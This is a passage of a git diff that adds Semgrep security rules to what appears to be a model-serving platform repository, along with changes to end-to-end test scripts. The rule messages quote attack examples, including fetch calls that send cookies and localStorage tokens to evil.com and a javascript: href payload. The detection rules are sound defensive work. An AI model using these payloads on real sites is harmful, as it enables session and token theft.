weights_only=True, ...) 
+ metadata: + cwe: "CWE-502" + owasp: "A08:2021 - Software and Data Integrity Failures" + category: "security" + references: + - "https://pytorch.org/docs/stable/generated/torch.load.html" + + - id: python-unsafe-deserialization-dill-cloudpickle + languages: [python] + severity: INFO + message: | + Unsafe deserialization via dill/cloudpickle/shelve (CWE-502). + + Attack Vector: Like pickle, these libraries can execute arbitrary code during + deserialization. A malicious serialized object can compromise the service. + + Context: dill and cloudpickle are commonly used in distributed ML frameworks + (Ray, Dask) for internal task serialization. This is generally safe when + deserializing data from trusted internal sources (Ray workers, Dask scheduler). + + Risk: HIGH when deserializing user-provided or externally-sourced data. + Risk: LOW when used for internal framework communication. + + Remediation: + - Never deserialize data from untrusted sources + - For internal framework use, add justification comment: + # nosemgrep: python-unsafe-deserialization-dill-cloudpickle - internal Ray serialization + patterns: + - pattern-either: + - pattern: dill.load(...) + - pattern: dill.loads(...) + - pattern: cloudpickle.load(...) + - pattern: cloudpickle.loads(...) + - pattern: shelve.open(...) + metadata: + cwe: "CWE-502" + owasp: "A08:2021 - Software and Data Integrity Failures" + category: "security" + + - id: python-ssl-verify-disabled + languages: [python] + severity: WARNING + message: | + SSL/TLS certificate verification disabled (CWE-295). + + Attack Vector: verify=False disables certificate validation, enabling + Man-in-the-Middle attacks. Attacker can intercept and modify traffic + including credentials, model data, and API responses. + + Context: In Kubernetes with Istio service mesh, internal service calls + may legitimately use verify=False since mTLS is handled at the proxy layer. + This is UNSAFE for external API calls (HuggingFace, S3, external services). 
+ + Remediation: + - For external APIs: Use verify=True (default) with proper CA certificates + - For internal services with service mesh: Document the architectural decision + # nosemgrep: python-ssl-verify-disabled - internal mTLS via Istio + - For custom CAs: Point to CA bundle: verify="/path/to/ca-bundle.crt" + patterns: + - pattern-either: + - pattern: requests.get(..., verify=False, ...) + - pattern: requests.post(..., verify=False, ...) + - pattern: requests.put(..., verify=False, ...) + - pattern: requests.delete(..., verify=False, ...) + - pattern: requests.patch(..., verify=False, ...) + - pattern: httpx.Client(..., verify=False, ...) + - pattern: httpx.AsyncClient(..., verify=False, ...) + paths: + exclude: + - "**/tests/**" + - "**/*_test.py" + - "**/test_*.py" + metadata: + cwe: "CWE-295" + owasp: "A02:2021 - Cryptographic Failures" + category: "security" + + - id: python-grpc-insecure-channel + languages: [python] + severity: INFO + message: | + gRPC insecure channel - no TLS encryption (CWE-319). + + Attack Vector: grpc.insecure_channel() transmits data in plaintext, + enabling eavesdropping and tampering. + + Context: In Kubernetes with service mesh (Istio/Envoy), internal gRPC calls + often use insecure channels since mTLS is handled at the sidecar proxy layer. + This is standard for KServe, ModelMesh, and internal model serving. + + Risk: HIGH for external/egress gRPC calls outside the cluster. + Risk: LOW for internal cluster communication with service mesh. + + Remediation: + - External calls: Use grpc.secure_channel() with proper credentials + - Internal calls with service mesh: Document the decision + # nosemgrep: python-grpc-insecure-channel - Istio mTLS handles encryption + pattern: grpc.insecure_channel(...) 
+ metadata: + cwe: "CWE-319" + category: "security" + + # ========================================================================== + # SECTION 7: TYPESCRIPT / JAVASCRIPT SECURITY — React Frontends + # ========================================================================== + + - id: ts-react-dangerous-html-no-sanitization + languages: [typescript, javascript] + severity: ERROR + message: | + XSS vulnerability via dangerouslySetInnerHTML without sanitization (CWE-79). + + Attack Vector: User-controlled HTML rendered without sanitization: +
+ // userComment: "" + + Impact: Attacker can: + - Steal session tokens via document.cookie + - Perform actions as victim user (CSRF) + - Redirect to phishing sites + - Inject keyloggers + + Remediation: Sanitize HTML with DOMPurify before rendering: + import DOMPurify from 'dompurify'; + +
+ patterns: + - pattern: | + <$EL dangerouslySetInnerHTML={{__html: $HTML}} /> + - pattern-not: | + <$EL dangerouslySetInnerHTML={{__html: DOMPurify.sanitize(...)}} /> + metadata: + cwe: "CWE-79" + owasp: "A03:2021 - Injection" + category: "security" + + - id: ts-react-href-javascript-protocol + languages: [typescript, javascript] + severity: ERROR + message: | + XSS vulnerability via javascript: protocol in href (CWE-79). + + Attack Vector: User-controlled href with javascript: protocol executes arbitrary code: + Click me + // userUrl: "javascript:alert(document.cookie)" + + Remediation: Validate URLs and block javascript: protocol: + const isSafeUrl = (url: string) => { + return url.startsWith('http://') || url.startsWith('https://') || url.startsWith('/'); + }; + + {isSafeUrl(userUrl) && Click me} + patterns: + - pattern: | + <$EL href={$URL} ...> + ... + + - metavariable-pattern: + metavariable: $URL + patterns: + - pattern-not: '"..."' # Exclude literal strings + metadata: + cwe: "CWE-79" + owasp: "A03:2021 - Injection" + category: "security" + + - id: ts-eval-injection + languages: [typescript, javascript] + severity: ERROR + message: | + Code injection via eval() (CWE-94). + + Attack Vector: eval() executes arbitrary JavaScript: + eval(userInput) // Input: "fetch('https://evil.com?cookies='+document.cookie)" + + Remediation: Never use eval() with user input. + - For JSON: Use JSON.parse() + - For dynamic property access: Use bracket notation obj[prop] + - For dynamic function calls: Use Function constructor (with extreme caution) + pattern: eval($INPUT) + metadata: + cwe: "CWE-94" + owasp: "A03:2021 - Injection" + category: "security" + + - id: ts-function-constructor-injection + languages: [typescript, javascript] + severity: WARNING + message: | + Code injection via Function constructor. + + Similar to eval(), Function constructor can execute arbitrary code: + new Function(userCode)() + + Remediation: Avoid dynamic code execution. Use safe alternatives. 
+ pattern: new Function($CODE) + metadata: + cwe: "CWE-94" + category: "security" + + - id: ts-localstorage-sensitive-data + languages: [typescript, javascript] + severity: WARNING + message: | + Sensitive data stored in localStorage (CWE-922). + + Security Risks: + 1. localStorage is accessible to ALL scripts on same origin (XSS can steal it) + 2. Data persists indefinitely (even after browser close) + 3. No httpOnly protection (accessible via JavaScript) + 4. No secure flag (transmitted over HTTP if page downgrades) + + Attack Vector: XSS exploit reads localStorage: + fetch('https://evil.com?token=' + localStorage.getItem('token')) + + Remediation: Use httpOnly secure cookies for sensitive data: + Set-Cookie: session=...; HttpOnly; Secure; SameSite=Strict + + Cookies with httpOnly cannot be accessed by JavaScript (XSS protection). + patterns: + - pattern-either: + - pattern: localStorage.setItem("token", ...) + - pattern: localStorage.setItem("password", ...) + - pattern: localStorage.setItem("apiKey", ...) + - pattern: localStorage.setItem("secret", ...) + - pattern: localStorage.setItem("jwt", ...) + - pattern: localStorage.setItem("auth", ...) + metadata: + cwe: "CWE-922" + owasp: "A02:2021 - Cryptographic Failures" + category: "security" + + - id: ts-regex-denial-of-service + languages: [typescript, javascript] + severity: INFO + message: | + Potentially vulnerable regex - possible ReDoS (CWE-1333). + + Vulnerable pattern detected: Nested quantifiers like (a+)+ or (a*)* + Review if user-controlled input can reach this regex. 
+ + Attack Vector: Malicious input causes exponential backtracking: + /^(a+)+$/.test('a'.repeat(50) + 'b') // Takes minutes to fail + + Remediation: Simplify regex or use timeout: + - Avoid nested quantifiers: /^a+$/ instead of /^(a+)+$/ + - Use atomic groups if available + - Set regex timeout in Node.js (not supported in browser) + pattern-regex: '\([^)]*[+*]\)[+*{]' + metadata: + cwe: "CWE-1333" + owasp: "A06:2021 - Vulnerable and Outdated Components" + category: "security" + + - id: ts-postmessage-no-origin-check + languages: [typescript, javascript] + severity: ERROR + message: | + postMessage listener without origin validation (CWE-942). + + Attack Vector: Malicious iframe sends messages to steal data or trigger actions: + window.addEventListener('message', (event) => { + processCommand(event.data); // No origin check! + }); + + Remediation: Validate message origin: + window.addEventListener('message', (event) => { + if (event.origin !== 'https://trusted-domain.com') { + return; // Reject messages from untrusted origins + } + processCommand(event.data); + }); + patterns: + - pattern: | + window.addEventListener('message', ($EVENT) => { + ... + }) + - pattern-not-inside: | + if ($EVENT.origin === ...) { + ... + } + - pattern-not-inside: | + if ($EVENT.origin !== ...) { + return; + } + metadata: + cwe: "CWE-942" + category: "security" + + # ========================================================================== + # SECTION 8: DOCKERFILE SECURITY + # ========================================================================== + + - id: dockerfile-latest-tag + languages: [dockerfile] + severity: WARNING + message: | + Using 'latest' tag is not recommended for reproducibility. + + The :latest tag is mutable and can point to different images over time, + causing builds to be non-reproducible and potentially introducing + breaking changes or vulnerabilities. 
+ + Remediation: Pin to a specific version: + FROM registry/image:v1.2.3 + pattern-regex: 'FROM\s+[^:]+:latest' + metadata: + category: "security" + + - id: dockerfile-secret-in-env + languages: [dockerfile] + severity: ERROR + message: | + Hardcoded secret in Dockerfile ENV instruction (CWE-798). + + ENV values are baked into image layers and visible via: + - docker history + - docker inspect + - Container runtime metadata + + Remediation: Use build args with --secret flag (BuildKit) or runtime env vars: + # Build-time: docker build --secret id=mysecret,src=secret.txt + RUN --mount=type=secret,id=mysecret cat /run/secrets/mysecret + pattern-regex: 'ENV\s+(PASSWORD|SECRET|TOKEN|API_KEY)\s*=\s*.+' + metadata: + cwe: "CWE-798" + category: "security" + + # ========================================================================== + # SECTION 9: SHELL SCRIPT SECURITY + # ========================================================================== + + - id: shell-eval-injection + languages: [bash, sh] + severity: ERROR + message: | + Use of 'eval' is dangerous and can lead to code injection (CWE-94). + + eval executes its arguments as a shell command, which can be exploited + if any part of the input comes from untrusted sources. + + Remediation: Avoid eval. Use arrays for dynamic commands: + # Instead of: eval "$cmd" + # Use: "${cmd_array[@]}" + pattern-regex: 'eval\s+' + metadata: + cwe: "CWE-94" + category: "security" + + - id: shell-unquoted-var-in-dangerous-cmd + languages: [bash, sh] + severity: ERROR + message: | + Unquoted variable in dangerous command - potential command injection (CWE-78). + + Unquoted variables in commands like rm, cp, mv, chmod, chown, kill undergo + word splitting and glob expansion. A filename with spaces or special characters + can cause unintended behavior or arbitrary file operations. 
+ + Remediation: Always quote variables in file operations: + rm "$FILE" # correct + rm $FILE # dangerous + pattern-regex: '(rm|cp|mv|eval|chmod|chown|kill|pkill)\s+[^|;]*(?&2' ERR - -# Repo/E2E dirs -REPO_ROOT="$(git rev-parse --show-toplevel 2>/dev/null || pwd)" -E2E_DIR="${REPO_ROOT}/test/e2e" - -# Defaults (overridable via env) -NS="${NS:-llm}" -MODEL_PATH="${MODEL_PATH:-docs/samples/models/facebook-opt-125m-cpu}" -GATEWAY_NAME="${GATEWAY_NAME:-maas-default-gateway}" -GATEWAY_NS="${GATEWAY_NS:-openshift-ingress}" -WRITE_ENV="${WRITE_ENV:-true}" # write test/e2e/.env -SKIP_DEPLOY="${SKIP_DEPLOY:-true}" # default true (don’t redeploy model unless you want to) - -echo "[bootstrap] oc whoami: $(oc whoami || true)" -echo "[bootstrap] NS=${NS} MODEL_PATH=${MODEL_PATH} SKIP_DEPLOY=${SKIP_DEPLOY}" - -command -v oc >/dev/null 2>&1 || { echo "oc missing"; exit 1; } -command -v jq >/dev/null 2>&1 || { echo "jq missing"; exit 1; } -command -v kustomize >/dev/null 2>&1 || { echo "kustomize missing"; exit 1; } - -# ---- Detect model CR name from kustomize -if command -v yq >/dev/null 2>&1; then - DEDUCED_CR="$(kustomize build "${MODEL_PATH}" | yq -r 'select(.kind=="LLMInferenceService") | .metadata.name' | head -n1)" -else - DEDUCED_CR="$(kustomize build "${MODEL_PATH}" | awk '/^kind: LLMInferenceService$/{f=1} f&&/^ name:/{print $2; exit}')" -fi -if [[ -z "${DEDUCED_CR:-}" ]]; then - echo "[bootstrap] Could not detect LLMInferenceService name from ${MODEL_PATH}" >&2 - exit 1 -fi -export MODEL_NAME="${MODEL_NAME:-$DEDUCED_CR}" -echo "[bootstrap] Using kind=llminferenceservice ns=${NS} (${MODEL_PATH##*/})" -echo "[bootstrap] Model CR name: ${MODEL_NAME}" - -# ---- Deploy PostgreSQL for API key storage (required for E2E tests) -MAAS_NS="${MAAS_NS:-opendatahub}" -echo "[bootstrap] Checking PostgreSQL in namespace: ${MAAS_NS}" -if ! kubectl get deployment postgres -n "${MAAS_NS}" &>/dev/null; then - echo "[bootstrap] PostgreSQL not found, deploying..." 
- - POSTGRES_USER="${POSTGRES_USER:-maas}" - POSTGRES_DB="${POSTGRES_DB:-maas}" - - # Generate random password if not provided - POSTGRES_PASSWORD="${POSTGRES_PASSWORD:-}" - if [[ -z "${POSTGRES_PASSWORD}" ]]; then - POSTGRES_PASSWORD="$(openssl rand -base64 32 | tr -d '/+=' | cut -c1-32)" - echo "[bootstrap] Generated random PostgreSQL password (stored in secret postgres-creds)" - fi - - kubectl apply -n "${MAAS_NS}" -f - </dev/null 2>&1 || oc create ns "${NS}" - echo "[bootstrap] Applying from: ${MODEL_PATH}/" - kustomize build "${MODEL_PATH}" | kubectl apply -f - - echo "[bootstrap] Waiting for llminferenceservice/${MODEL_NAME} to be Ready (timeout 15m)…" - oc -n "${NS}" wait --for=condition=Ready "llminferenceservice/${MODEL_NAME}" --timeout=15m -else - echo "[bootstrap] Skipping model deployment (SKIP_DEPLOY=${SKIP_DEPLOY})" -fi - -# ---- Discover gateway host and MaaS API URL -HOST="${HOST:-}" -if [[ -z "${HOST}" ]]; then - HOST="$(oc -n "${GATEWAY_NS}" get gateway "${GATEWAY_NAME}" -o jsonpath='{.status.addresses[0].value}' 2>/dev/null || true)" -fi -if [[ -z "${HOST}" ]]; then - # Fallback to cluster apps domain - APPS="$(oc get ingresses.config/cluster -o jsonpath='{.spec.domain}' 2>/dev/null || oc get ingresses.config.openshift.io cluster -o jsonpath='{.spec.domain}' 2>/dev/null || true)" - HOST="gateway.${APPS}" -fi -if [[ -z "${HOST}" ]]; then - echo "[bootstrap] ERROR: could not determine HOST" >&2 - exit 1 -fi - -# Prefer https if healthz responds; otherwise http -SCHEME="https" -if ! 
curl -skS -m 5 "${SCHEME}://${HOST}/maas-api/healthz" -o /dev/null ; then - SCHEME="http" -fi - -export HOST -export MAAS_API_BASE_URL="${SCHEME}://${HOST}/maas-api" - -# Try to discover model base URL via catalog (nice-to-have) -FREE_OC_TOKEN="$(oc whoami -t || true)" -MODEL_URL_DISC="" -if [[ -n "${FREE_OC_TOKEN}" ]]; then - # Note: /v1/tokens endpoint was removed, now use OC token directly for management APIs - MODELS_JSON="$(curl -sSk -H "Authorization: Bearer ${FREE_OC_TOKEN}" "${MAAS_API_BASE_URL}/v1/models" || true)" - MODEL_URL_DISC="$(echo "${MODELS_JSON}" | jq -r '(.data // .models // [])[0]?.url // empty' 2>/dev/null || true)" -fi - -# Compose model URL if catalog didn’t give us one -if [[ -z "${MODEL_URL_DISC}" ]]; then - MODEL_URL_DISC="${SCHEME}://${HOST}/llm/${MODEL_NAME}" -fi -MODEL_URL="${MODEL_URL_DISC%/}/v1" - -echo "[bootstrap] MAAS_API_BASE_URL=${MAAS_API_BASE_URL}" -echo "[bootstrap] MODEL_URL=${MODEL_URL}" - -# ---- Write .env for convenience -if [[ "${WRITE_ENV}" == "true" ]]; then - mkdir -p "${E2E_DIR}" - cat > "${E2E_DIR}/.env" </dev/null || { echo "oc missing"; exit 1; } -command -v kustomize >/dev/null || { echo "kustomize missing"; exit 1; } - -# -------- Deploy model -------- -oc get ns "${NS}" >/dev/null 2>&1 || oc create ns "${NS}" -echo "[e2e] Applying ${MODEL_PATH} to ns ${NS}" -kustomize build "${MODEL_PATH}" | kubectl -n "${NS}" apply -f - -echo "[e2e] Waiting for LLMInferenceService/${MODEL_NAME} Ready…" -ISVC_NAME="${ISVC_NAME:-}" -if [[ -z "${ISVC_NAME}" ]]; then - if command -v yq >/dev/null 2>&1; then - ISVC_NAME="$(kustomize build "${MODEL_PATH}" | yq -r 'select(.kind=="LLMInferenceService") | .metadata.name' | head -n1)" - else - ISVC_NAME="$(kustomize build "${MODEL_PATH}" | awk '/^kind: LLMInferenceService$/{f=1} f&&/^ name:/{print $2; exit}')" - fi -fi -oc -n "${NS}" wait --for=condition=Ready "llminferenceservice/${ISVC_NAME}" --timeout=15m - -# -------- Work out API base URL (simple rules) -------- -if [[ -z 
"${MAAS_API_BASE_URL}" ]]; then - if [[ -z "${HOST}" ]]; then - if [[ -z "${CLUSTER_DOMAIN}" ]]; then - echo "[e2e] ERROR: set MAAS_API_BASE_URL or HOST or CLUSTER_DOMAIN" >&2 - exit 2 - fi - HOST="maas.${CLUSTER_DOMAIN}" - fi - SCHEME="https" - if ! curl -skI -m 5 "${SCHEME}://${HOST}/maas-api/healthz" >/dev/null; then - SCHEME="http" - fi - MAAS_API_BASE_URL="${SCHEME}://${HOST}/maas-api" -fi - -export HOST -export MAAS_API_BASE_URL -export MODEL_NAME - -echo "[e2e] HOST=${HOST}" -echo "[e2e] MAAS_API_BASE_URL=${MAAS_API_BASE_URL}" - -# -------- Run smoke -------- -mkdir -p "${ARTIFACT_DIR}" -echo "[e2e] Running smoke tests…" -( cd test/e2e && bash ./smoke.sh ) - -# Copy artifacts if a different dir was requested -if [[ "test/e2e/reports" != "${ARTIFACT_DIR}" ]]; then - cp -r test/e2e/reports/. "${ARTIFACT_DIR}/" -fi -echo "[e2e] Done. Reports in ${ARTIFACT_DIR}" diff --git a/test/e2e/run_api_key_tests.sh b/test/e2e/run_api_key_tests.sh deleted file mode 100755 index 88435ab99..000000000 --- a/test/e2e/run_api_key_tests.sh +++ /dev/null @@ -1,75 +0,0 @@ -#!/usr/bin/env bash -set -euo pipefail - -SCRIPT_DIR="$(cd "$(dirname "${BASH_SOURCE[0]}")" && pwd)" -cd "$SCRIPT_DIR" - -echo "========================================" -echo " API Key Management E2E Tests" -echo "========================================" - -# Activate virtual environment -if [[ ! -d ".venv" ]]; then - echo "[setup] Virtual environment not found. Run bootstrap.sh first." - exit 1 -fi - -source .venv/bin/activate - -# Auto-discover MAAS_API_BASE_URL if not set -if [[ -z "${MAAS_API_BASE_URL:-}" ]]; then - echo "[setup] MAAS_API_BASE_URL not set, attempting to discover from OpenShift route..." 
- ROUTE_HOST=$(oc get route maas-api -n maas-system -o jsonpath='{.spec.host}' 2>/dev/null || echo "") - if [[ -n "$ROUTE_HOST" ]]; then - export MAAS_API_BASE_URL="https://${ROUTE_HOST}/maas-api" - echo "[setup] Discovered MAAS_API_BASE_URL: $MAAS_API_BASE_URL" - else - echo "[ERROR] Could not discover MAAS_API_BASE_URL. Please set it manually:" - echo " export MAAS_API_BASE_URL=https://your-maas-api-url/maas-api" - exit 1 - fi -fi - -# Auto-obtain token if not set -if [[ -z "${TOKEN:-}" ]]; then - echo "[setup] TOKEN not set, obtaining via 'oc whoami -t'..." - export TOKEN=$(oc whoami -t 2>/dev/null || echo "") - if [[ -z "$TOKEN" ]]; then - echo "[ERROR] Could not obtain token. Please set it manually:" - echo " export TOKEN=\$(oc whoami -t)" - exit 1 - fi - echo "[setup] Obtained TOKEN (length: ${#TOKEN})" -fi - -# Optional admin token for authorization tests -if [[ -z "${ADMIN_OC_TOKEN:-}" ]]; then - echo "[setup] ADMIN_OC_TOKEN not set. Admin authorization tests will be skipped." - echo "[setup] To run admin tests, set: export ADMIN_OC_TOKEN=" -else - echo "[setup] ADMIN_OC_TOKEN is set (length: ${#ADMIN_OC_TOKEN})" -fi - -echo "" -echo "[run] Environment:" -echo " MAAS_API_BASE_URL: $MAAS_API_BASE_URL" -echo " TOKEN: ${TOKEN:0:10}... (${#TOKEN} chars)" -echo " ADMIN_OC_TOKEN: ${ADMIN_OC_TOKEN:+SET}" -echo "" - -# Create reports directory -mkdir -p reports - -# Run the tests -echo "[run] Running API Key tests with pytest..." -pytest tests/test_api_keys.py -v \ - --html=reports/api-keys-report.html \ - --self-contained-html \ - -o log_cli=true \ - -o log_cli_level=INFO - -echo "" -echo "========================================" -echo " Tests Complete!" 
-echo "========================================" -echo "Report: $SCRIPT_DIR/reports/api-keys-report.html" diff --git a/test/e2e/scripts/auth_utils.sh b/test/e2e/scripts/auth_utils.sh index 678a9f745..13cdb4609 100755 --- a/test/e2e/scripts/auth_utils.sh +++ b/test/e2e/scripts/auth_utils.sh @@ -203,8 +203,10 @@ run_auth_debug_report() { _section "maas-controller" _run "maas-controller pods" "kubectl get pods -n $DEPLOYMENT_NAMESPACE -l app=maas-controller -o wide 2>/dev/null || true" - _run "maas-controller MAAS_API_NAMESPACE" \ - "kubectl get deployment maas-controller -n $DEPLOYMENT_NAMESPACE -o jsonpath='{.spec.template.spec.containers[0].env}' 2>/dev/null | jq -r '.[] | select(.name==\"MAAS_API_NAMESPACE\") | \"\(.name)=\(.value // .valueFrom.fieldRef.fieldPath // \"N/A\")\"' 2>/dev/null || echo 'N/A'" + + local env_display + env_display=$(kubectl get deployment maas-controller -n $DEPLOYMENT_NAMESPACE -o jsonpath='{.spec.template.spec.containers[0].env}' 2>/dev/null | jq -r '.[] | select(.name=="MAAS_API_NAMESPACE") | if .value then "\(.name)=\(.value)" elif .valueFrom.fieldRef.fieldPath then "\(.name)=\(.valueFrom.fieldRef.fieldPath) (resolves to: '"$DEPLOYMENT_NAMESPACE"')" else "\(.name)=N/A" end' 2>/dev/null || echo 'MAAS_API_NAMESPACE=N/A') + _run "maas-controller MAAS_API_NAMESPACE" "echo '$env_display'" _append "" _section "Kuadrant AuthPolicies" @@ -214,7 +216,78 @@ run_auth_debug_report() { _section "MaaS CRs" _run "MaaSAuthPolicies" "kubectl get maasauthpolicies -n $MAAS_SUBSCRIPTION_NAMESPACE -o wide 2>/dev/null || true" _run "MaaSSubscriptions" "kubectl get maassubscriptions -n $MAAS_SUBSCRIPTION_NAMESPACE -o wide 2>/dev/null || true" - _run "MaaSModelRefs" "kubectl get maasmodelrefs -n $DEPLOYMENT_NAMESPACE -o wide 2>/dev/null || true" + _run "MaaSModelRefs (all namespaces)" "kubectl get maasmodelrefs -A -o wide 2>/dev/null || true" + _append "" + + _section "Test User Information" + local test_token + test_token=$(oc whoami -t 2>/dev/null || echo 
"") + if [[ -n "$test_token" ]]; then + _append "Test user token available: yes" + + # Try to get user info from token review + local user_info + user_info=$(kubectl create --dry-run=server --raw /apis/authentication.k8s.io/v1/tokenreviews -f - </dev/null | jq -r '.status.user // empty' +{ + "apiVersion": "authentication.k8s.io/v1", + "kind": "TokenReview", + "spec": { + "token": "$test_token" + } +} +EOF +) + if [[ -n "$user_info" ]]; then + local username groups + username=$(echo "$user_info" | jq -r '.username // "N/A"') + groups=$(echo "$user_info" | jq -r '.groups // [] | join(", ")') + _append " Username: $username" + _append " Groups: $groups" + else + _append " Could not retrieve user info from token" + fi + else + _append "No test token available (not logged in via oc)" + fi + _append "" + + _section "Subscription → Model Mapping" + local subscriptions_json sub_mapping + subscriptions_json=$(kubectl get maassubscriptions -n $MAAS_SUBSCRIPTION_NAMESPACE -o json 2>/dev/null | jq -r '.items // []' 2>/dev/null) + if [[ -n "$subscriptions_json" ]] && [[ "$subscriptions_json" != "[]" ]]; then + sub_mapping=$(echo "$subscriptions_json" | jq -r '.[] | + "Subscription: " + .metadata.name + + "\n Owner users: " + ((.spec.owner.users // []) | join(", ") | if . == "" then "(none)" else . end) + + "\n Owner groups: " + ((.spec.owner.groups // [] | map(.name)) | join(", ") | if . == "" then "(none)" else . end) + + "\n Models: " + ((.spec.modelRefs // [] | map(.namespace + "/" + .name)) | join(", ") | if . == "" then "(none)" else . 
end)' 2>/dev/null) + if [[ -n "$sub_mapping" ]]; then + _append "$sub_mapping" + else + _append "Failed to parse subscription data" + fi + else + _append "No subscriptions found in $MAAS_SUBSCRIPTION_NAMESPACE" + fi + _append "" + + _section "Available Models (MaaSModelRefs)" + local models_json model_listing + models_json=$(kubectl get maasmodelrefs -A -o json 2>/dev/null | jq -r '.items // []' 2>/dev/null) + if [[ -n "$models_json" ]] && [[ "$models_json" != "[]" ]]; then + _append "Model Reference → Model ID / Endpoint" + model_listing=$(echo "$models_json" | jq -r '.[] | + " " + .metadata.namespace + "/" + .metadata.name + + " → " + (.spec.modelRef.name // "N/A") + + " (" + (.status.phase // "unknown") + ")" + + if .status.endpoint then "\n Endpoint: " + .status.endpoint else "" end' 2>/dev/null) + if [[ -n "$model_listing" ]]; then + _append "$model_listing" + else + _append "Failed to parse model data" + fi + else + _append "No MaaSModelRefs found" + fi _append "" _section "Gateway / HTTPRoutes" @@ -226,14 +299,66 @@ run_auth_debug_report() { _run "Authorino pods" "kubectl get pods -n $AUTHORINO_NAMESPACE -l 'app.kubernetes.io/name=authorino' --no-headers 2>/dev/null; kubectl get pods -n openshift-ingress -l 'app.kubernetes.io/name=authorino' --no-headers 2>/dev/null; echo '---'; kubectl get pods -A -l 'app.kubernetes.io/name=authorino' -o wide 2>/dev/null || true" _append "" - # Determine maas-api namespace + # Determine maas-api namespace from controller deployment local maas_api_ns - maas_api_ns=$(kubectl get deployment maas-controller -n $DEPLOYMENT_NAMESPACE -o jsonpath='{.spec.template.spec.containers[0].env}' 2>/dev/null | jq -r '.[] | select(.name=="MAAS_API_NAMESPACE") | .value' 2>/dev/null || echo "$DEPLOYMENT_NAMESPACE") + local env_json + env_json=$(kubectl get deployment maas-controller -n $DEPLOYMENT_NAMESPACE -o jsonpath='{.spec.template.spec.containers[0].env}' 2>/dev/null || echo "[]") + + # Try to get direct .value first + maas_api_ns=$(echo 
"$env_json" | jq -r '.[] | select(.name=="MAAS_API_NAMESPACE") | .value // empty' 2>/dev/null) + + # If empty, check if using fieldRef (downward API) + if [[ -z "$maas_api_ns" ]]; then + local field_path + field_path=$(echo "$env_json" | jq -r '.[] | select(.name=="MAAS_API_NAMESPACE") | .valueFrom.fieldRef.fieldPath // empty' 2>/dev/null) + if [[ "$field_path" == "metadata.namespace" ]]; then + # Using downward API - the value is the controller's namespace + maas_api_ns="$DEPLOYMENT_NAMESPACE" + fi + fi + + # Fallback to deployment namespace if still empty [[ -z "$maas_api_ns" ]] && maas_api_ns="$DEPLOYMENT_NAMESPACE" - local sub_select_url="https://maas-api.${maas_api_ns}.svc.cluster.local:8443/v1/subscriptions/select" + local sub_select_url="https://maas-api.${maas_api_ns}.svc.cluster.local:8443/internal/v1/subscriptions/select" _section "Subscription Selector Endpoint Validation" _append "Expected URL (from maas-controller config): $sub_select_url" + _append " (MAAS_API_NAMESPACE resolved to: $maas_api_ns)" + _append "" + + # Verify actual AuthPolicy configuration + _append "--- Sample AuthPolicy subscription-info configuration ---" + local sample_policy_json + sample_policy_json=$(kubectl get authpolicies -A -l 'app.kubernetes.io/managed-by=maas-controller' -o json 2>/dev/null | jq -r '.items[0] // empty' 2>/dev/null) + + if [[ -n "$sample_policy_json" ]]; then + local policy_name policy_ns + policy_name=$(echo "$sample_policy_json" | jq -r '.metadata.name // "unknown"') + policy_ns=$(echo "$sample_policy_json" | jq -r '.metadata.namespace // "unknown"') + _append " Inspecting: $policy_ns/$policy_name" + + local actual_url + actual_url=$(echo "$sample_policy_json" | jq -r '.spec.rules.metadata."subscription-info".http.url // "N/A"' 2>/dev/null) + _append " Actual URL in AuthPolicy: $actual_url" + + local request_body + request_body=$(echo "$sample_policy_json" | jq -r '.spec.rules.metadata."subscription-info".http.body.expression // "N/A"' 2>/dev/null) + if 
echo "$request_body" | grep -q "requestedModel"; then + _append " ✅ Request body includes requestedModel field" + # Extract the model reference from the body + local model_ref + model_ref=$(echo "$request_body" | grep -o '"requestedModel"[^"]*"[^"]*"' | sed 's/.*"\([^"]*\)".*/\1/' || echo "") + if [[ -n "$model_ref" ]]; then + _append " Model reference: $model_ref" + fi + else + _append " ❌ Request body MISSING requestedModel field (should include model namespace/name)" + fi + _append " Request body preview:" + _append "$(echo "$request_body" | head -5 | sed 's/^/ /')" + else + _append " No managed AuthPolicies found" + fi _append "" local curl_ns="$AUTHORINO_NAMESPACE" @@ -261,6 +386,24 @@ run_auth_debug_report() { _append "$dns_out" _append "" + _section "Configuration Summary" + _append "This summary helps compare local vs CI runs:" + _append "" + local total_models total_subs total_authpolicies total_kuadrant_authpolicies + total_models=$(echo "$models_json" | jq '. | length' 2>/dev/null || echo "0") + total_subs=$(echo "$subscriptions_json" | jq '. 
| length' 2>/dev/null || echo "0") + total_authpolicies=$(kubectl get maasauthpolicies -n $MAAS_SUBSCRIPTION_NAMESPACE -o json 2>/dev/null | jq -r '.items | length' 2>/dev/null || echo "0") + total_kuadrant_authpolicies=$(kubectl get authpolicies -A -l 'app.kubernetes.io/managed-by=maas-controller' -o json 2>/dev/null | jq -r '.items | length' 2>/dev/null || echo "0") + + _append " MaaSModelRefs (all namespaces): $total_models" + _append " MaaSSubscriptions ($MAAS_SUBSCRIPTION_NAMESPACE): $total_subs" + _append " MaaSAuthPolicies ($MAAS_SUBSCRIPTION_NAMESPACE): $total_authpolicies" + _append " Generated Kuadrant AuthPolicies: $total_kuadrant_authpolicies" + _append "" + _append " Subscription selector URL: $sub_select_url" + _append " Test user: $(oc whoami 2>/dev/null || echo 'N/A')" + _append "" + echo "$OUTPUT" } diff --git a/test/e2e/scripts/prow_run_smoke_test.sh b/test/e2e/scripts/prow_run_smoke_test.sh index 2999643c3..0616e3e10 100755 --- a/test/e2e/scripts/prow_run_smoke_test.sh +++ b/test/e2e/scripts/prow_run_smoke_test.sh @@ -11,9 +11,9 @@ # 1. Install cert-manager and LeaderWorkerSet (LWS) operators (required for KServe) # 2. Deploy MaaS platform via kustomize (RHCL, gateway, MaaS API, maas-controller) # 3. Install OpenDataHub (ODH) operator with DataScienceCluster (KServe) -# 4. Deploy MaaS system (free + premium + unconfigured: LLMIS + MaaSModelRef + MaaSAuthPolicy + MaaSSubscription) +# 4. Deploy MaaS system (free + premium + e2e test fixtures: LLMIS + MaaSModelRef + MaaSAuthPolicy + MaaSSubscription) # 5. Setup test tokens (admin + regular user) for comprehensive testing -# 6. Run E2E tests (API keys + subscription tests) +# 6. Run E2E tests (API keys + subscription + models endpoint tests) # 7. 
